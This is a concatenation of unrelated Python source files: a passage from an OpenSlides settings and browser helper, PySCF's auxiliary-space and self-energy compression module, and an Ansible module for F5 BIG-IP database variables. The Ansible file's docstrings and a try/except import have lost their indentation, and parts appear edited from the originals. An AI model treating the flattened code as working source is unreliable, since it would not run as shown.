    chars = "abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)"
    context.setdefault("secret_key", get_random_string(50, chars))
    # Fill any template keys the caller did not supply with defaults.
    for key, value in get_default_settings_context().items():
        context.setdefault(key, value)

    content = template % context
    settings_module = os.path.realpath(settings_dir)
    if not os.path.exists(settings_module):
        os.makedirs(settings_module)
    with open(settings_path, "w") as settings_file:
        settings_file.write(content)

    # Ensure the user data directory (with its static/ subdir) exists; the
    # context value is either a function-call marker or a repr()'d path.
    if context["openslides_user_data_dir"] == "get_win32_portable_user_data_dir()":
        openslides_user_data_dir = get_win32_portable_user_data_dir()
    else:
        openslides_user_data_dir = context["openslides_user_data_dir"].strip("'")
    os.makedirs(os.path.join(openslides_user_data_dir, "static"), exist_ok=True)
    return os.path.realpath(settings_path)
def open_browser(host: str, port: int) -> None:
    """
    Launches the default web browser at the given host and port and opens
    the webinterface. Uses start_browser internally.
    """
    # 0.0.0.0 is a bind-all address, not a routable one; Windows cannot open
    # it in a browser, so fall back to localhost.
    effective_host = "localhost" if host == "0.0.0.0" else host
    start_browser(f"http://{effective_host}:{port}")
def start_browser(browser_url: str) -> None:
    """
    Launches the default web browser at the given url and opens the
    webinterface.
    """
    try:
        browser = webbrowser.get()
    except webbrowser.Error:
        print("Could not locate runnable browser: Skipping start")
        return

    def delayed_open() -> None:
        # Give the server a moment to come up before opening the page.
        # TODO: Use a nonblocking sleep event here. Tornado has such features.
        time.sleep(1)
        browser.open(browser_url)

    threading.Thread(target=delayed_open).start()
def get_database_path_from_settings() -> Optional[str]:
    """
    Retrieves the database path out of the settings file. Returns None,
    if it is not a SQLite3 database.

    Needed for the backupdb command.
    """
    # Imported lazily so the settings module must already be configured.
    from django.conf import settings as django_settings
    from django.db import DEFAULT_DB_ALIAS

    default = django_settings.DATABASES.get(DEFAULT_DB_ALIAS)
    if not default:
        raise DatabaseInSettingsError("Default databases is not configured")
    database_path = default.get("NAME")
    if not database_path:
        raise DatabaseInSettingsError("No path or name specified for default database.")
    # Only SQLite databases have a file path worth backing up.
    if default.get("ENGINE") != "django.db.backends.sqlite3":
        return None
    return database_path
def is_local_installation() -> bool:
    """
    Returns True if the command is called for a local installation

    This is the case if manage.py is used, or when the --local-installation flag is set.
    """
    # The condition is already a bool; the former `True if ... else False`
    # wrapper was redundant.
    return "--local-installation" in sys.argv or "manage.py" in sys.argv[0]
def is_windows() -> bool:
    """
    Returns True if the current system is Windows. Returns False otherwise.
    """
    platform_name = sys.platform
    return platform_name == "win32"
| |
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Oliver Backhouse <olbackhouse@gmail.com>
# George Booth <george.booth@kcl.ac.uk>
#
'''
Auxiliary space class and helper functions.
'''
import time
import numpy as np
import scipy.linalg.blas
from pyscf import lib
from pyscf.lib import logger
from pyscf import __config__
from pyscf.lib.parameters import LARGE_DENOM
class AuxiliarySpace(object):
    ''' Simple container to hold the energies, couplings and chemical
    potential associated with an auxiliary space.

    Attributes:
        energy : 1D array
            Energies of the poles
        coupling : 2D array
            Coupling vector of the poles to each physical state
        chempot : float
            Chemical potential associated with the energies
    '''

    def __init__(self, energy, coupling, chempot=0.0):
        self.energy = np.asarray(energy)
        # C-contiguous layout for efficient column slicing below.
        self.coupling = np.asarray(coupling, order='C')
        self.chempot = chempot
        self.sort()

    def sort(self):
        ''' Sort in-place via the energies to make slicing easier.
        '''
        arg = np.argsort(self.energy)
        self.energy = self.energy[arg]
        self.coupling = self.coupling[:,arg]

    def real_freq_spectrum(self, *args, **kwargs):
        ''' See subclasses.
        '''
        raise NotImplementedError

    def compress(self, *args, **kwargs):
        ''' See subclasses.
        '''
        raise NotImplementedError

    def get_occupied(self):
        ''' Returns a copy of the current AuxiliarySpace object
        containing only the poles with energy less than the
        chemical potential. The object should already be sorted.

        Returns:
            :class:`AuxiliarySpace` with only the occupied auxiliaries
        '''
        # Energies are kept sorted (see sort()), so a binary search gives
        # the occupied/virtual split point.
        nocc = np.searchsorted(self.energy, self.chempot)
        energy = np.copy(self.energy[:nocc])
        coupling = np.copy(self.coupling[:,:nocc])
        return self.__class__(energy, coupling, chempot=self.chempot)

    def get_virtual(self):
        ''' Returns a copy of the current AuxiliarySpace object
        containing only the poles with energy greater than the
        chemical potential. The object should already be sorted.

        Returns:
            :class:`AuxiliarySpace` with only the virtual auxiliaries
        '''
        nocc = np.searchsorted(self.energy, self.chempot)
        energy = np.copy(self.energy[nocc:])
        coupling = np.copy(self.coupling[:,nocc:])
        return self.__class__(energy, coupling, chempot=self.chempot)

    def get_array(self, phys, out=None, chempot=0.0):
        ''' Expresses the auxiliaries as an array, i.e. the extended
        Fock matrix in AGF2 or Hamiltonian of ADC(2).

        Args:
            phys : 2D array
                Physical (1p + 1h) part of the matrix

        Kwargs:
            out : 2D array
                If provided, use to store output
            chempot : float
                Scale energies (by default, :attr:`chempot` is not used
                and energies retain their values). Default 0.0

        Returns:
            Array representing the coupling of the auxiliary space to
            the physical space
        '''
        _check_phys_shape(self, phys)

        dtype = np.result_type(phys.dtype, self.energy.dtype, self.coupling.dtype)

        if out is None:
            out = np.zeros((self.nphys+self.naux,)*2, dtype=dtype)

        # Block structure: [[phys, coupling], [coupling^H, diag(energy)]]
        sp = slice(None, self.nphys)
        sa = slice(self.nphys, None)

        out[sp,sp] = phys
        out[sp,sa] = self.coupling
        out[sa,sp] = self.coupling.conj().T
        out[sa,sa][np.diag_indices(self.naux)] = self.energy - chempot

        return out

    def dot(self, phys, vec, out=None, chempot=0.0):
        ''' Returns the dot product of :func:`get_array` with a vector.

        Args:
            phys : 2D array
                Physical (1p + 1h) part of the matrix
            vec : ndarray
                Vector to compute dot product with

        Kwargs:
            out : 2D array
                If provided, use to store output
            chempot : float
                Scale energies (by default, :attr:`chempot` is not used
                and energies retain their values). Default 0.0

        Returns:
            ndarray with shape of :attr:`vec`
        '''
        _check_phys_shape(self, phys)

        vec = np.asarray(vec)
        input_shape = vec.shape
        vec = vec.reshape((self.nphys+self.naux, -1))
        dtype = np.result_type(self.coupling.dtype, vec.dtype)

        sp = slice(None, self.nphys)
        sa = slice(self.nphys, None)

        if out is None:
            out = np.zeros(vec.shape, dtype=dtype)
        out = out.reshape(vec.shape)

        out[sp] = np.dot(phys, vec[sp])
        out[sp] += np.dot(self.coupling, vec[sa])

        # NOTE(review): (vec[sp].T @ coupling).conj().T equals
        # coupling^H @ vec[sp].conj(), i.e. vec is conjugated too — this is
        # only the Hermitian product for real vec; confirm for complex input.
        out[sa] = np.dot(vec[sp].T, self.coupling).conj().T
        out[sa] += (self.energy[:,None] - chempot) * vec[sa]

        out = out.reshape(input_shape)

        return out

    def eig(self, phys, out=None, chempot=0.0):
        ''' Computes the eigenvalues and eigenvectors of the array
        returned by :func:`get_array`.

        Args:
            phys : 2D array
                Physical (1p + 1h) part of the matrix

        Kwargs:
            out : 2D array
                If provided, use to store output
            chempot : float
                Scale energies (by default, :attr:`chempot` is not used
                and energies retain their values). Default 0.0

        Returns:
            tuple of ndarrays (eigenvalues, eigenvectors)
        '''
        _check_phys_shape(self, phys)

        h = self.get_array(phys, chempot=chempot, out=out)
        w, v = np.linalg.eigh(h)

        return w, v

    def moment(self, n, squeeze=True):
        ''' Builds the nth moment of the spectral distribution.

        Args:
            n : int or list of int
                Moment(s) to compute

        Kwargs:
            squeeze : bool
                If True, use :func:`np.squeeze` on output so that in
                the case of :attr:`n` being an int, a 2D array is
                returned. If False, output is always 3D. Default True.

        Returns:
            ndarray of moments
        '''
        n = np.asarray(n)
        n = n.reshape(n.size)

        # moments[n] = sum_k v[:,k] v[:,k]^* e_k^n
        energy_factored = self.energy[None] ** n[:,None]
        v = self.coupling
        moms = lib.einsum('xk,yk,nk->nxy', v, v.conj(), energy_factored)

        if squeeze:
            moms = np.squeeze(moms)

        return moms

    def remove_uncoupled(self, tol):
        ''' Removes poles with very low spectral weight (uncoupled
        to the physical space) in-place.

        Args:
            tol : float
                Threshold for the spectral weight (squared norm)
        '''
        v = self.coupling
        w = np.linalg.norm(v, axis=0) ** 2

        arg = w >= tol

        self.energy = self.energy[arg]
        self.coupling = self.coupling[:,arg]

    def save(self, chkfile, key=None):
        ''' Saves the auxiliaries in chkfile

        Args:
            chkfile : str
                Name of chkfile
            key : str
                Key to be used in h5py object. It can contain "/" to
                represent the path in the HDF5 storage structure.
        '''
        if key is None:
            key = 'aux'

        lib.chkfile.dump(chkfile, key, self.__dict__)

    @classmethod
    def load(cls, chkfile, key=None):
        ''' Loads the auxiliaries from a chkfile

        Args:
            chkfile : str
                Name of chkfile
            key : str
                Key to be used in h5py object. It can contain "/" to
                represent the path in the HDF5 storage structure.
        '''
        if key is None:
            key = 'aux'

        dct = lib.chkfile.load(chkfile, key)

        return cls(dct['energy'], dct['coupling'], chempot=dct['chempot'])

    def copy(self):
        ''' Returns a copy of the current object.

        Returns:
            AuxiliarySpace
        '''
        energy = np.copy(self.energy)
        coupling = np.copy(self.coupling)
        return self.__class__(energy, coupling, chempot=self.chempot)

    @property
    def nphys(self):
        # Number of physical (1p + 1h) states.
        return self.coupling.shape[0]

    @property
    def naux(self):
        # Number of auxiliary poles.
        return self.coupling.shape[1]
class SelfEnergy(AuxiliarySpace):
    ''' Defines a self-energy represented as a :class:`AuxiliarySpace`
    object.
    '''

    def real_freq_spectrum(self, grid, eta=0.02):
        # Spectra are only meaningful for the Green's function representation.
        raise ValueError('Convert SelfEnergy to GreensFunction before '
                         'building a spectrum.')

    def get_greens_function(self, phys):
        ''' Returns a :class:`GreensFunction` by solving the Dyson
        equation.

        Args:
            phys : 2D array
                Physical space (1p + 1h), typically the Fock matrix

        Returns:
            :class:`GreensFunction`
        '''
        w, v = self.eig(phys)
        # Keep only the projection of each eigenvector onto the physical
        # block; the eigenvalues become the Green's function poles.
        v = v[:self.nphys]

        return GreensFunction(w, v, chempot=self.chempot)

    def make_rdm1(self, phys, chempot=None, occupancy=2):
        ''' Returns the first-order reduced density matrix associated
        with the self-energy via the :class:`GreensFunction`.

        Args:
            phys : 2D array
                Physical space (1p + 1h), typically the Fock matrix

        Kwargs:
            chempot : float
                If provided, use instead of :attr:`self.chempot`
            occupancy : int
                Occupancy of the states, i.e. 2 for RHF and 1 for UHF
        '''
        gf = self.get_greens_function(phys)
        return gf.make_rdm1(phys, chempot=chempot, occupancy=occupancy)

    def compress(self, phys=None, n=(None, 0), tol=1e-12):
        ''' Compress the auxiliaries via moments of the particle and
        hole Green's function and self-energy. Resulting :attr:`naux`
        depends on the chosen :attr:`n`.

        Kwargs:
            phys : 2D array or None
                Physical space (1p + 1h), typically the Fock matrix.
                Only required if :attr:`n[0]` is not None.
            n : tuple of int
                Compression level of the Green's function and
                self-energy, respectively.
            tol : float
                Linear dependecy tolerance. Default value is 1e-12

        Returns:
            :class:`SelfEnergy` with reduced auxiliary dimension.

        Raises:
            MemoryError if the compression according to Green's
            function moments will exceed the maximum allowed memory.
        '''
        ngf, nse = n
        se = self

        if nse is None and ngf is None:
            return self.copy()

        # Self-energy moment compression first, then Green's function
        # moment compression on the result.
        if nse is not None:
            se = compress_via_se(se, n=nse)

        if ngf is not None:
            se = compress_via_gf(se, phys, n=ngf, tol=tol)

        return se
class GreensFunction(AuxiliarySpace):
    ''' Defines a Green's function represented as a
    :class:`AuxiliarySpace` object.
    '''

    def real_freq_spectrum(self, grid, eta=0.02):
        ''' Express the auxiliaries as a spectral function on the real
        frequency axis.

        Args:
            grid : 1D array
                Real frequency grid

        Kwargs:
            eta : float
                Peak broadening factor in Hartrees. Default is 0.02.

        Returns:
            ndarray of the spectrum, with the first index being the
            frequency
        '''
        e_shifted = self.energy - self.chempot
        v = self.coupling

        spectrum = np.zeros((grid.size, self.nphys, self.nphys), dtype=complex)

        # Process the grid in chunks to bound the size of the denom array.
        blksize = 240

        p1 = 0
        for block in range(0, grid.size, blksize):
            p0, p1 = p1, min(p1 + blksize, grid.size)
            denom = grid[p0:p1,None] - (e_shifted + eta*1.0j)[None]
            spectrum[p0:p1] = lib.einsum('xk,yk,wk->wxy', v, v.conj(), 1./denom)

        # A(w) = -1/pi Tr[Im G(w)]
        return -1/np.pi * np.trace(spectrum.imag, axis1=1, axis2=2)

    def make_rdm1(self, chempot=None, occupancy=2):
        ''' Returns the first-order reduced density matrix associated
        with the Green's function.

        Kwargs:
            chempot : float
                If provided, use instead of :attr:`self.chempot`
            occupancy : int
                Occupancy of the states, i.e. 2 for RHF and 1 for UHF
        '''
        if chempot is None:
            chempot = self.chempot

        # Density matrix from the occupied (below-chempot) poles only.
        arg = self.energy < chempot
        v_occ = self.coupling[:,arg]
        rdm1 = np.dot(v_occ, v_occ.T.conj()) * occupancy

        return rdm1

    def compress(self, *args, **kwargs):
        raise ValueError('Compression must be performed on SelfEnergy '
                         'rather than GreensFunction.')
def combine(*auxspcs):
    ''' Combine a set of :class:`AuxiliarySpace` objects. attr:`chempot`
    is inherited from the first element.
    '''
    sizes = [auxspc.nphys for auxspc in auxspcs]
    if any(size != sizes[0] for size in sizes):
        raise ValueError('Size of physical space must be the same to '
                         'combine AuxiliarySpace objects.')
    nphys = sizes[0]

    naux_total = sum(auxspc.naux for auxspc in auxspcs)
    dtype = np.result_type(*[auxspc.coupling for auxspc in auxspcs])

    energy = np.zeros((naux_total,))
    coupling = np.zeros((nphys, naux_total), dtype=dtype)

    # Concatenate the poles of each space along the auxiliary axis.
    offset = 0
    for auxspc in auxspcs:
        end = offset + auxspc.naux
        energy[offset:end] = auxspc.energy
        coupling[:, offset:end] = auxspc.coupling
        offset = end

    return auxspcs[0].__class__(energy, coupling, chempot=auxspcs[0].chempot)
def davidson(auxspc, phys, chempot=None, nroots=1, which='SM', tol=1e-14, maxiter=None, ntrial=None):
    ''' Diagonalise the array represented by the auxiliary space using
    the sparse :func:`AuxiliarySpace.dot` method, with the Davidson
    algorithm.

    This algorithm may perform poorly for IPs or EAs if they are
    not extremal eigenvalues, which they are not in standard AGF2.

    Args:
        auxspc : AuxiliarySpace or subclass
            Auxiliary space object to solve for
        phys : 2D array
            Physical space (1p + 1h), typically the Fock matrix

    Kwargs:
        chempot : float
            If provided, use instead of :attr:`self.chempot`
            NOTE(review): accepted but not referenced in this body —
            confirm whether it should influence auxspc.dot.
        nroots : int
            Number of roots to solve for. Default 1.
        which : str
            Which eigenvalues to solve for ('LM', 'SM', 'LA', 'SA').
            Default 'SM'.
        tol : float
            Convergence threshold
        maxiter : int
            Maximum number of iterations. Default 10*dim
        ntrial : int
            Maximum number of trial vectors. Default
            min(dim, max(2*nroots+1, 20))

    Returns:
        tuple (conv, eigenvalues, eigenvectors) from lib.davidson1
    '''
    _check_phys_shape(auxspc, phys)

    dim = auxspc.nphys + auxspc.naux
    maxiter = 10 * dim if maxiter is None else maxiter
    ntrial = min(dim, max(2 * nroots + 1, 20)) if ntrial is None else ntrial

    if which not in ['SM', 'LM', 'SA', 'LA']:
        raise ValueError(which)

    # Magnitude-based selections compare |w|; algebraic ones compare w.
    abs_op = np.absolute if which in ['SM', 'LM'] else (lambda x: x)
    # Ascending order for "smallest", descending for "largest".
    order = 1 if which in ['SM', 'SA'] else -1

    matvec = lambda x: auxspc.dot(phys, np.asarray(x))
    diag = np.concatenate([np.diag(phys), auxspc.energy])

    # Unit guesses on the nroots diagonal entries best matching `which`.
    guess = [np.zeros((dim)) for _ in range(nroots)]
    mask = np.argsort(abs_op(diag))[::order]
    for i in range(nroots):
        guess[i][mask[i]] = 1

    def pick(w, v, nroots, callback):
        # Reorder the subspace eigenpairs according to `which`.
        idx = np.argsort(abs_op(w))[::order]
        return w[idx], v[:, idx], 0

    conv, w, v = lib.davidson1(matvec, guess, diag, tol=tol, nroots=nroots,
                               max_space=ntrial, max_cycle=maxiter, pick=pick)
    return conv, w, v
def _band_lanczos(se_occ, n=0, max_memory=None):
    ''' Perform the banded Lanczos algorithm for compression of a
        self-energy according to consistency in its separate
        particle and hole moments.

    Args:
        se_occ : object exposing ``energy`` (1D, naux) and
            ``coupling`` (2D, nphys x naux)

    Kwargs:
        n : int
            Moment truncation parameter; n+1 blocks are generated.
        max_memory :
            Accepted but unused in this body — TODO confirm callers.

    Returns:
        tuple (v_tri, t): ``v_tri`` is the upper-triangular Cholesky
        factor of coupling.coupling^T, ``t`` the banded projection of
        diag(energy) onto the generated Krylov space.
    '''
    nblk = n+1
    nphys, naux = se_occ.coupling.shape
    bandwidth = nblk * nphys

    q = np.zeros((bandwidth, naux))   # Lanczos vectors, one per row
    t = np.zeros((bandwidth, bandwidth))
    r = np.zeros((naux))              # residual / work vector

    # cholesky qr factorisation of v.T
    coupling = se_occ.coupling
    x = np.dot(coupling, coupling.T)
    try:
        v_tri = np.linalg.cholesky(x).T
    except np.linalg.LinAlgError:
        # x numerically singular: clamp its spectrum to stay positive
        # definite, then retry the factorisation.
        w, v = np.linalg.eigh(x)
        w[w < 1e-20] = 1e-20
        x_posdef = np.dot(np.dot(v, np.diag(w)), v.T)
        v_tri = np.linalg.cholesky(x_posdef).T

    # First block: couplings orthonormalised against v_tri.
    q[:nphys] = np.dot(np.linalg.inv(v_tri).T, coupling)

    for i in range(bandwidth):
        r[:] = se_occ.energy * q[i]

        start = max(i-nphys, 0)
        if start != i:
            # Orthogonalise against the previous (up to nphys) vectors.
            r -= np.dot(t[i,start:i], q[start:i])

        for j in range(i, min(i+nphys, bandwidth)):
            t[i,j] = t[j,i] = np.dot(r, q[j])
            # r := -t[i,j] * q[j] + r  (in-place BLAS update of r)
            scipy.linalg.blas.daxpy(q[j], r, a=-t[i,j])

        if (i+nphys) < bandwidth:
            len_r = np.linalg.norm(r)
            t[i,i+nphys] = t[i+nphys,i] = len_r
            # Tiny additive guard avoids division by zero when r has
            # vanished; LARGE_DENOM is a module-level constant.
            q[i+nphys] = r / (len_r + 1./LARGE_DENOM)

    return v_tri, t
def _compress_part_via_se(se_occ, n=0):
    ''' Compress the auxiliaries of one (occupied or virtual) part of
        the self-energy according to consistency in its moments.
    '''
    nphys = se_occ.nphys

    if nphys > se_occ.naux:
        # Fewer auxiliaries than physical states: compression breaks
        # this version of the algorithm and is also pointless, so
        # return copies of the existing poles unchanged.
        return se_occ.energy.copy(), se_occ.coupling.copy()

    v_tri, t = _band_lanczos(se_occ, n=n)
    e, v = np.linalg.eigh(t)
    v = np.dot(v_tri.T, v[:nphys])
    return e, v
def _compress_via_se(se, n=0):
    ''' Compress the auxiliaries of the separate occupied and
        virtual parts of the self-energy according to consistency
        in its moments. Returns (energies, couplings).
    '''
    if se.naux == 0:
        return se.energy, se.coupling

    energies = []
    couplings = []

    # Occupied (hole) and virtual (particle) sectors are compressed
    # independently; empty sectors contribute nothing.
    for part in (se.get_occupied(), se.get_virtual()):
        if part.naux == 0:
            continue
        e_part, v_part = _compress_part_via_se(part, n=n)
        energies.append(e_part)
        couplings.append(v_part)

    return np.concatenate(energies, axis=0), np.concatenate(couplings, axis=-1)
def compress_via_se(se, n=0):
    ''' Compress the auxiliaries of the separate occupied and
        virtual parts of the self-energy according to consistency
        in its moments.

    Args:
        se : SelfEnergy
            Auxiliaries of the self-energy

    Kwargs:
        n : int
            Truncation parameter, conserves the separate particle
            and hole moments to order 2*n+1.

    Returns:
        :class:`SelfEnergy` with reduced auxiliary dimension

    Ref:
        [1] H. Muther, T. Taigel and T.T.S. Kuo, Nucl. Phys., 482,
            1988, pp. 601-616.
        [2] D. Van Neck, K. Piers and M. Waroquier, J. Chem. Phys.,
            115, 2001, pp. 15-25.
        [3] H. Muther and L.D. Skouras, Nucl. Phys., 55, 1993,
            pp. 541-562.
        [4] Y. Dewulf, D. Van Neck, L. Van Daele and M. Waroquier,
            Phys. Lett. B, 396, 1997, pp. 7-14.
    '''
    energy, coupling = _compress_via_se(se, n=n)
    return SelfEnergy(energy, coupling, chempot=se.chempot)
def _build_projector(se, phys, n=0, tol=1e-12):
    ''' Build the vectors which project the auxiliary space into a
        compressed one with consistency in the separate particle and
        hole moments up to order 2n+1.

    Args:
        se : SelfEnergy-like object
        phys : 2D array, (nphys, nphys)

    Kwargs:
        n : int
            Moment truncation order.
        tol : float
            Eigenvalue cutoff below which projector directions are
            discarded as linearly dependent.

    Returns:
        2D array mapping (nphys+naux) -> (nphys+nvec).
    '''
    _check_phys_shape(se, phys)
    nphys, naux = se.coupling.shape

    w, v = se.eig(phys)

    def _part(w, v, s):
        # Moment basis for the selected eigenpairs:
        # en[m, i] = w_i**m for m = 0..n.
        en = w[s][None] ** np.arange(n+1)[:,None]
        v = v[:,s]
        p = np.einsum('xi,pi,ni->xpn', v[nphys:], v[:nphys], en)
        return p.reshape(naux, nphys*(n+1))

    # Hole (w < chempot) and particle (w >= chempot) sectors contribute
    # separate moment blocks.
    p = np.hstack((_part(w, v, w < se.chempot),
                   _part(w, v, w >= se.chempot)))

    # Normalise columns; zero-norm columns get a tiny scale instead of
    # dividing by zero (LARGE_DENOM is a module-level constant).
    norm = np.linalg.norm(p, axis=0, keepdims=True)
    norm[np.absolute(norm) == 0] = 1./LARGE_DENOM
    p /= norm

    # Orthogonalise and drop linearly dependent directions.
    w, p = np.linalg.eigh(np.dot(p, p.T))
    p = p[:, w > tol]
    nvec = p.shape[1]

    # Embed: physical space passes through unchanged, auxiliaries are
    # rotated into the retained vectors.
    p = np.block([[np.eye(nphys), np.zeros((nphys, nvec))],
                  [np.zeros((naux, nphys)), p]])

    return p
def _compress_via_gf(se, phys, n=0, tol=1e-12):
    ''' Compress the auxiliaries of the separate occupied and
        virtual parts of the self-energy according to consistency
        in the moments of the Green's function.
    '''
    nphys = se.nphys

    proj = _build_projector(se, phys, n=n, tol=tol)
    # Project the full (phys + aux) matrix into the reduced basis.
    h_proj = np.dot(proj.T, se.dot(phys, proj))
    proj = None  # release the projector before the diagonalisation

    e, rot = np.linalg.eigh(h_proj[nphys:, nphys:])
    v = np.dot(h_proj[:nphys, nphys:], rot)
    return e, v
def compress_via_gf(se, phys, n=0, tol=1e-12):
    ''' Compress the auxiliaries of the separate occupied and
        virtual parts of the self-energy according to consistency
        in the moments of the Green's function.

    Args:
        se : SelfEnergy
            Auxiliaries of the self-energy
        phys : 2D array
            Physical space (1p + 1h), typically the Fock matrix

    Kwargs:
        n : int
            Truncation parameter, conserves the separate particle
            and hole moments to order 2*n+1.
        tol : float
            Linear dependency tolerance. Default value is 1e-12

    Returns:
        :class:`SelfEnergy` with reduced auxiliary dimension
    '''
    energy, coupling = _compress_via_gf(se, phys, n=n, tol=tol)
    return SelfEnergy(energy, coupling, chempot=se.chempot)
def _check_phys_shape(auxspc, phys):
    # The physical-space matrix must be square with the same dimension
    # as the leading axis of the coupling matrix.
    expected = (auxspc.nphys, auxspc.nphys)
    if np.shape(phys) != expected:
        raise ValueError('Size of physical space must be the same as '
                         'leading dimension of couplings.')
| |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: bigip_sys_db
short_description: Manage BIG-IP system database variables
description:
- Manage BIG-IP system database variables
version_added: "2.2"
options:
key:
description:
- The database variable to manipulate.
required: True
state:
description:
- The state of the variable on the system. When C(present), guarantees
that an existing variable is set to C(value). When C(reset) sets the
variable back to the default value. At least one of value and state
C(reset) are required.
required: False
default: present
choices:
- present
- reset
value:
description:
- The value to set the key to. At least one of value and state C(reset)
are required.
required: False
notes:
- Requires the f5-sdk Python package on the host. This is as easy as pip
install f5-sdk.
- Requires BIG-IP version 12.0.0 or greater
extends_documentation_fragment: f5
requirements:
- f5-sdk
author:
- Tim Rupp (@caphrim007)
'''
EXAMPLES = '''
- name: Set the boot.quiet DB variable on the BIG-IP
bigip_sys_db:
user: "admin"
password: "secret"
server: "lb.mydomain.com"
key: "boot.quiet"
value: "disable"
delegate_to: localhost
- name: Disable the initial setup screen
bigip_sys_db:
user: "admin"
password: "secret"
server: "lb.mydomain.com"
key: "setup.run"
value: "false"
delegate_to: localhost
- name: Reset the initial setup screen
bigip_sys_db:
user: "admin"
password: "secret"
server: "lb.mydomain.com"
key: "setup.run"
state: "reset"
delegate_to: localhost
'''
RETURN = '''
name:
description: The key in the system database that was specified
returned: changed and success
type: string
sample: "setup.run"
default_value:
description: The default value of the key
returned: changed and success
type: string
sample: "true"
value:
description: The value that you set the key to
returned: changed and success
type: string
sample: "false"
'''
from ansible.module_utils.f5_utils import AnsibleF5Client
from ansible.module_utils.f5_utils import AnsibleF5Parameters
from ansible.module_utils.f5_utils import HAS_F5SDK
from ansible.module_utils.f5_utils import F5ModuleError
try:
from ansible.module_utils.f5_utils import iControlUnexpectedHTTPError
except ImportError:
HAS_F5SDK = False
class Parameters(AnsibleF5Parameters):
    # Device attribute name -> module-facing name.
    api_map = {
        'defaultValue': 'default_value'
    }

    # Attributes written to the device.
    api_attributes = ['value']

    # Attributes compared between want/have.
    updatables = ['value']

    # Attributes reported back to the user.
    returnables = ['name', 'value', 'default_value']

    def to_return(self):
        """Collect the returnable attributes as a filtered dict."""
        collected = dict((key, getattr(self, key)) for key in self.returnables)
        return self._filter_params(collected)

    def api_params(self):
        """Collect the device-bound attributes, resolving api_map names."""
        collected = {}
        for attr in self.api_attributes:
            if self.api_map is not None and attr in self.api_map:
                collected[attr] = getattr(self, self.api_map[attr])
            else:
                collected[attr] = getattr(self, attr)
        return self._filter_params(collected)

    @property
    def name(self):
        # The variable's name is stored under the 'key' parameter.
        return self._values['key']

    @name.setter
    def name(self, value):
        self._values['key'] = value
class ModuleManager(object):
    """Implements the read/compare/update cycle for a single BIG-IP
    system database variable.
    """

    def __init__(self, client):
        self.client = client
        self.have = None  # device-side state, filled by read_current_from_device()
        self.want = Parameters(self.client.module.params)
        self.changes = Parameters()

    def _update_changed_options(self):
        """Record which updatable options differ between want and have.

        Populates ``self.changes`` and returns True when anything changed.
        """
        changed = {}
        for key in Parameters.updatables:
            if getattr(self.want, key) is not None:
                attr1 = getattr(self.want, key)
                attr2 = getattr(self.have, key)
                if attr1 != attr2:
                    changed[key] = attr1
        if self.want.state == 'reset':
            if str(self.want.value) == str(self.want.default_value):
                changed[self.want.key] = self.want.value
        if changed:
            self.changes = Parameters(changed)
            return True
        return False

    def exec_module(self):
        """Entry point: dispatch on state and return the result dict."""
        changed = False
        result = dict()
        state = self.want.state

        try:
            if state == "present":
                changed = self.present()
            elif state == "reset":
                changed = self.reset()
        except iControlUnexpectedHTTPError as e:
            raise F5ModuleError(str(e))

        changes = self.changes.to_return()
        result.update(**changes)
        result.update(dict(changed=changed))
        return result

    def read_current_from_device(self):
        """Load the variable from the device; returns Parameters."""
        resource = self.client.api.tm.sys.dbs.db.load(
            name=self.want.key
        )
        result = resource.attrs
        return Parameters(result)

    def exists(self):
        """Return True when the device value equals the wanted value."""
        resource = self.client.api.tm.sys.dbs.db.load(
            name=self.want.key
        )
        if str(resource.value) == str(self.want.value):
            return True
        return False

    def present(self):
        if self.exists():
            return False
        else:
            return self.update()

    def update(self):
        if self.want.value is None:
            raise F5ModuleError(
                "When setting a key, a value must be supplied"
            )
        self.have = self.read_current_from_device()
        if not self.should_update():
            return False
        if self.client.check_mode:
            return True
        self.update_on_device()
        return True

    def should_update(self):
        result = self._update_changed_options()
        if result:
            return True
        return False

    def update_on_device(self):
        params = self.want.api_params()
        resource = self.client.api.tm.sys.dbs.db.load(
            name=self.want.key
        )
        resource.update(**params)

    def reset(self):
        """Reset the variable to its device-default value."""
        self.have = self.read_current_from_device()
        if not self.should_update():
            return False
        if self.client.check_mode:
            return True
        # Bug fix: this previously called update_on_device(), which pushes
        # want.value (normally unset when state=reset) and left
        # reset_on_device() as dead code; a reset must write the default.
        self.reset_on_device()
        # After the reset the device holds the default value, so make
        # exists() compare against that rather than the original want.value.
        self.want.update({'value': self.have.default_value})
        if self.exists():
            return True
        else:
            raise F5ModuleError(
                "Failed to reset the DB variable"
            )

    def reset_on_device(self):
        """Write the device's stored default value back to the variable."""
        resource = self.client.api.tm.sys.dbs.db.load(
            name=self.want.key
        )
        # Bug fix: the default comes from the device (have), not from the
        # module parameters — 'default_value' is never a module argument,
        # so want.default_value is always None here.
        resource.update(value=self.have.default_value)
class ArgumentSpec(object):
    """Declares the Ansible argument spec for the bigip_sys_db module."""

    def __init__(self):
        self.supports_check_mode = True
        self.argument_spec = {
            'key': {'required': True},
            'state': {
                'default': 'present',
                'choices': ['present', 'reset'],
            },
            'value': {},
        }
        self.f5_product_name = 'bigip'
def main():
    """Module entry point: build the client, run the manager, report."""
    if not HAS_F5SDK:
        raise F5ModuleError("The python f5-sdk module is required")

    spec = ArgumentSpec()
    client = AnsibleF5Client(
        argument_spec=spec.argument_spec,
        supports_check_mode=spec.supports_check_mode,
        f5_product_name=spec.f5_product_name
    )

    try:
        manager = ModuleManager(client)
        results = manager.exec_module()
        client.module.exit_json(**results)
    except F5ModuleError as ex:
        client.module.fail_json(msg=str(ex))
# Run the module only when executed directly (not when imported).
if __name__ == '__main__':
    main()
| |
# -*- mode: python; coding: utf-8 -*-
# Copyright 2015-2018 Peter Williams <peter@newton.cx> and collaborators.
# Licensed under the MIT License.
